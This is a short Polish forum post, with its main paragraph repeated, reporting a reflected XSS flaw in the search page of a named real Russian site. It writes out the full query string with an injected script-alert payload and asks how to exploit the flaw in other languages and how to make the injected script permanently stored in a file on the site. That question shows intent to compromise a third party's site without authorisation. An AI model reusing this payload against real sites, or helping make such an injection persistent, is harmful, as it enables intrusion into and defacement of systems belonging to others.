Witam znalazłem pewną podatność XSS na stronie http://fsvps.ru/fsvps/search.html.
Otóż po kliknięciu szukaj wyskakują zmienne GET wraz z wartościami "?cx=013319394791989117117%3Aaerrkmkmpli&cof=FORID %3A11&_language=ru&q=&sa=Найти", wtedy należy go zamienić na "?cx=013319394791989117117%3Aaerrkmkmpli&cof=FORID %3A11&_language=en&q=1'"-->"<script>alert('XSS');</script>&sa=Найти".
A moje pytanie to w jakim (oprócz html i js) języku programownia można tę podatność wykorzystać i jaki skrypt trzeba napisać żeby to było na stałe wpisane w pliku na stronie?
Otóż po kliknięciu szukaj wyskakują zmienne GET wraz z wartościami "?cx=013319394791989117117%3Aaerrkmkmpli&cof=FORID %3A11&_language=ru&q=&sa=Найти", wtedy należy go zamienić na "?cx=013319394791989117117%3Aaerrkmkmpli&cof=FORID %3A11&_language=en&q=1'"-->"<script>alert('XSS');</script>&sa=Найти".
A moje pytanie to w jakim (oprócz html i js) języku programownia można tę podatność wykorzystać i jaki skrypt trzeba napisać żeby to było na stałe wpisane w pliku na stronie?